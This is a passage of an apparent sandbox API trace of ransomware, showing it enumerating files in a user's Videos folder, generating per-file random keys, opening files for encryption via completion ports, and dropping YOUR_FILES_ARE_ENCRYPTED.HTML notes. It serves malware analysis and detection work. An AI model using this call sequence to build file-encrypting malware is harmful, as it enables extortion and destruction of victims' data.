(in: param_1=0x4ebd776, param_2="%02X" | out: param_1="73") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="2B") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="A9") returned 2 [0168.944] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="04") 
returned 2 [0168.944] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="3A") returned 2 [0168.944] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="70") returned 2 [0168.944] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="F3") returned 2 [0168.944] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="2D") returned 2 [0168.944] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="46") returned 2 [0168.944] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="57") returned 2 [0168.944] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="BE") returned 2 [0168.944] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="67") returned 2 [0168.944] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="6E") returned 2 [0168.944] lstrcpyW (in: lpString1=0x78598cc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\kTlgx2Q.mp4" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\kTlgx2Q.mp4") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\kTlgx2Q.mp4" [0168.944] CreateIoCompletionPort (FileHandle=0x5ec, ExistingCompletionPort=0x3a0, CompletionKey=0x7849818, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.945] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7849818, lpOverlapped=0x7849818) returned 1 [0168.945] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26bb8690, ftCreationTime.dwHighDateTime=0x1d7e048, ftLastAccessTime.dwLowDateTime=0xeca211d0, ftLastAccessTime.dwHighDateTime=0x1d7e42b, ftLastWriteTime.dwLowDateTime=0xeca211d0, ftLastWriteTime.dwHighDateTime=0x1d7e42b, nFileSizeHigh=0x0, nFileSizeLow=0x10bff, dwReserved0=0x12341d5, dwReserved1=0x0, cFileName="l_JxA.mp4", 
cAlternateFileName="")) returned 1 [0168.945] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\l_JxA.mp4") returned 75 [0168.945] lstrcmpW (lpString1="l_JxA.mp4", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.945] PathFindExtensionW (pszPath="l_JxA.mp4") returned=".mp4" [0168.945] lstrlenW (lpString=".mp4") returned 4 [0168.945] PathFindExtensionW (pszPath="l_JxA.mp4") returned=".mp4" [0168.945] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.945] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\l_JxA.mp4" (normalized: "c:\\users\\5alr3u30d3\\videos\\riupxrt01pzmn5 8ov6f\\wxr2rttds hm\\l_jxa.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5f0 [0168.946] GetFileSizeEx (in: hFile=0x5f0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=68607) returned 1 [0168.946] GetProcessHeap () returned 0x270000 [0168.946] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7871970 [0168.950] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="31") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="9B") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="31") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="D0") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="CF") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="AF") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="1F") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="CD") 
returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="55") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="01") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="6E") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="BF") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="52") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="67") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="9F") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="50") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="EC") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="9E") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="72") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="46") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="29") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="0C") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="2B") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="17") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="81") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="09") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="73") returned 2 [0168.950] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="94") returned 2 [0168.951] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="DD") returned 2 [0168.951] wsprintfW (in: param_1=0x4ebd79e, 
param_2="%02X" | out: param_1="CC") returned 2 [0168.951] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="3D") returned 2 [0168.951] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="02") returned 2 [0168.951] lstrcpyW (in: lpString1=0x7881a24, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\l_JxA.mp4" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\l_JxA.mp4") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\l_JxA.mp4" [0168.951] CreateIoCompletionPort (FileHandle=0x5f0, ExistingCompletionPort=0x3a0, CompletionKey=0x7871970, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.951] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7871970, lpOverlapped=0x7871970) returned 1 [0168.951] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb84bc50, ftCreationTime.dwHighDateTime=0x1d7df13, ftLastAccessTime.dwLowDateTime=0xc42792f0, ftLastAccessTime.dwHighDateTime=0x1d7e0d6, ftLastWriteTime.dwLowDateTime=0xc42792f0, ftLastWriteTime.dwHighDateTime=0x1d7e0d6, nFileSizeHigh=0x0, nFileSizeLow=0xa32c, dwReserved0=0x12341d5, dwReserved1=0x0, cFileName="UpQI.swf", cAlternateFileName="")) returned 1 [0168.951] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\UpQI.swf") returned 74 [0168.951] lstrcmpW (lpString1="UpQI.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.951] PathFindExtensionW (pszPath="UpQI.swf") returned=".swf" [0168.951] lstrlenW (lpString=".swf") returned 4 [0168.951] PathFindExtensionW (pszPath="UpQI.swf") returned=".swf" [0168.951] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: 
lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61f049d0, ftCreationTime.dwHighDateTime=0x1d7e63d, ftLastAccessTime.dwLowDateTime=0x2aa1b590, ftLastAccessTime.dwHighDateTime=0x1d7e697, ftLastWriteTime.dwLowDateTime=0x2aa1b590, ftLastWriteTime.dwHighDateTime=0x1d7e697, nFileSizeHigh=0x0, nFileSizeLow=0x185c8, dwReserved0=0x12341d5, dwReserved1=0x0, cFileName="Vg AyopOMV.mkv", cAlternateFileName="VGAYOP~1.MKV")) returned 1 [0168.952] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\Vg AyopOMV.mkv") returned 80 [0168.952] lstrcmpW (lpString1="Vg AyopOMV.mkv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.952] PathFindExtensionW (pszPath="Vg AyopOMV.mkv") returned=".mkv" [0168.952] lstrlenW (lpString=".mkv") returned 4 [0168.952] PathFindExtensionW (pszPath="Vg AyopOMV.mkv") returned=".mkv" [0168.952] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda2b6bf0, ftCreationTime.dwHighDateTime=0x1d7e606, ftLastAccessTime.dwLowDateTime=0x7cc63360, ftLastAccessTime.dwHighDateTime=0x1d7e682, ftLastWriteTime.dwLowDateTime=0x7cc63360, ftLastWriteTime.dwHighDateTime=0x1d7e682, nFileSizeHigh=0x0, nFileSizeLow=0x176a4, dwReserved0=0x12341d5, dwReserved1=0x0, cFileName="wPVx.mp4", cAlternateFileName="")) returned 1 [0168.952] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\wPVx.mp4") returned 74 [0168.952] lstrcmpW (lpString1="wPVx.mp4", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.952] PathFindExtensionW (pszPath="wPVx.mp4") returned=".mp4" [0168.952] lstrlenW (lpString=".mp4") returned 4 [0168.952] PathFindExtensionW (pszPath="wPVx.mp4") returned=".mp4" [0168.952] SystemFunction036 (in: 
RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\wPVx.mp4" (normalized: "c:\\users\\5alr3u30d3\\videos\\riupxrt01pzmn5 8ov6f\\wxr2rttds hm\\wpvx.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5f4 [0168.953] GetFileSizeEx (in: hFile=0x5f4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=95908) returned 1 [0168.953] GetProcessHeap () returned 0x270000 [0168.953] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7899ac8 [0168.956] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="0B") returned 2 [0168.956] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="F1") returned 2 [0168.956] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="74") returned 2 [0168.956] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="13") returned 2 [0168.956] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="A5") returned 2 [0168.956] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="59") returned 2 [0168.956] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="1B") returned 2 [0168.956] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="C9") returned 2 [0168.956] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="37") returned 2 [0168.956] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="ED") returned 2 [0168.956] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="56") returned 2 [0168.956] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="F0") returned 2 [0168.956] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="4D") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="64") 
returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="74") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="9E") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="9E") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="2D") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="94") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="C4") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="E2") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="87") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="9C") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="29") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="DE") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="B7") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="EC") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="9B") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="4D") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="FF") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="E8") returned 2 [0168.957] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="25") returned 2 [0168.958] lstrcpyW (in: lpString1=0x78a9b7c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\wPVx.mp4" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\wPVx.mp4") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs 
HM\\wPVx.mp4" [0168.958] CreateIoCompletionPort (FileHandle=0x5f4, ExistingCompletionPort=0x3a0, CompletionKey=0x7899ac8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.958] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7899ac8, lpOverlapped=0x7899ac8) returned 1 [0168.958] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda2b6bf0, ftCreationTime.dwHighDateTime=0x1d7e606, ftLastAccessTime.dwLowDateTime=0x7cc63360, ftLastAccessTime.dwHighDateTime=0x1d7e682, ftLastWriteTime.dwLowDateTime=0x7cc63360, ftLastWriteTime.dwHighDateTime=0x1d7e682, nFileSizeHigh=0x0, nFileSizeLow=0x176a4, dwReserved0=0x12341d5, dwReserved1=0x0, cFileName="wPVx.mp4", cAlternateFileName="")) returned 0 [0168.958] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0168.958] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0168.958] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\videos\\riupxrt01pzmn5 8ov6f\\wxr2rttds hm\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b4 [0168.959] WriteFile (in: hFile=0x5b4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0168.961] CloseHandle (hObject=0x5b4) returned 1 [0168.961] GetProcessHeap () returned 0x270000 [0168.962] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x749a470 | out: hHeap=0x270000) returned 1 
[0168.962] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2659cd70, ftCreationTime.dwHighDateTime=0x1d7e28b, ftLastAccessTime.dwLowDateTime=0xbfa0610, ftLastAccessTime.dwHighDateTime=0x1d7e43a, ftLastWriteTime.dwLowDateTime=0xbfa0610, ftLastWriteTime.dwHighDateTime=0x1d7e43a, nFileSizeHigh=0x0, nFileSizeLow=0x15383, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="Z_cuynB3ZGeFf6DVUXD.avi", cAlternateFileName="Z_CUYN~1.AVI")) returned 1 [0168.962] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Z_cuynB3ZGeFf6DVUXD.avi") returned 75 [0168.962] lstrcmpW (lpString1="Z_cuynB3ZGeFf6DVUXD.avi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0168.962] PathFindExtensionW (pszPath="Z_cuynB3ZGeFf6DVUXD.avi") returned=".avi" [0168.962] lstrlenW (lpString=".avi") returned 4 [0168.962] PathFindExtensionW (pszPath="Z_cuynB3ZGeFf6DVUXD.avi") returned=".avi" [0168.962] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0168.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Z_cuynB3ZGeFf6DVUXD.avi" (normalized: "c:\\users\\5alr3u30d3\\videos\\riupxrt01pzmn5 8ov6f\\z_cuynb3zgeff6dvuxd.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b4 [0168.963] GetFileSizeEx (in: hFile=0x5b4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=86915) returned 1 [0168.963] GetProcessHeap () returned 0x270000 [0168.963] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x78c1c20 [0168.966] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="97") returned 2 [0168.966] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: 
param_1="CB") returned 2 [0168.966] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="9D") returned 2 [0168.966] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="94") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="0B") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="70") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="6A") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="C5") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="13") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="9E") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="F0") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="40") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="5B") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="14") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="16") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="8A") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="79") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="A2") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="31") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="84") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="A2") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="37") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="0D") returned 2 [0168.967] wsprintfW (in: 
param_1=0x4ebda92, param_2="%02X" | out: param_1="5B") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="48") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="05") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="85") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="0C") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="A5") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="B6") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="DB") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="39") returned 2 [0168.968] lstrcpyW (in: lpString1=0x78d1cd4, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Z_cuynB3ZGeFf6DVUXD.avi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Z_cuynB3ZGeFf6DVUXD.avi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Z_cuynB3ZGeFf6DVUXD.avi" [0168.968] CreateIoCompletionPort (FileHandle=0x5b4, ExistingCompletionPort=0x3a0, CompletionKey=0x78c1c20, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.968] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x78c1c20, lpOverlapped=0x78c1c20) returned 1 [0168.968] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2659cd70, ftCreationTime.dwHighDateTime=0x1d7e28b, ftLastAccessTime.dwLowDateTime=0xbfa0610, ftLastAccessTime.dwHighDateTime=0x1d7e43a, ftLastWriteTime.dwLowDateTime=0xbfa0610, ftLastWriteTime.dwHighDateTime=0x1d7e43a, nFileSizeHigh=0x0, nFileSizeLow=0x15383, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="Z_cuynB3ZGeFf6DVUXD.avi", cAlternateFileName="Z_CUYN~1.AVI")) 
returned 0 [0168.968] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0168.968] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0168.968] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\videos\\riupxrt01pzmn5 8ov6f\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d8 [0168.969] WriteFile (in: hFile=0x5d8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0168.971] CloseHandle (hObject=0x5d8) returned 1 [0168.971] GetProcessHeap () returned 0x270000 [0168.972] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0168.972] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9226fc0, ftCreationTime.dwHighDateTime=0x1d7de7f, ftLastAccessTime.dwLowDateTime=0xf943a950, ftLastAccessTime.dwHighDateTime=0x1d7e249, ftLastWriteTime.dwLowDateTime=0xf943a950, ftLastWriteTime.dwHighDateTime=0x1d7e249, nFileSizeHigh=0x0, nFileSizeLow=0x2c76, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="TWmxUNch5jv08E.swf", cAlternateFileName="TWMXUN~1.SWF")) returned 1 [0168.972] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\TWmxUNch5jv08E.swf") returned 49 [0168.972] lstrcmpW (lpString1="TWmxUNch5jv08E.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.972] PathFindExtensionW 
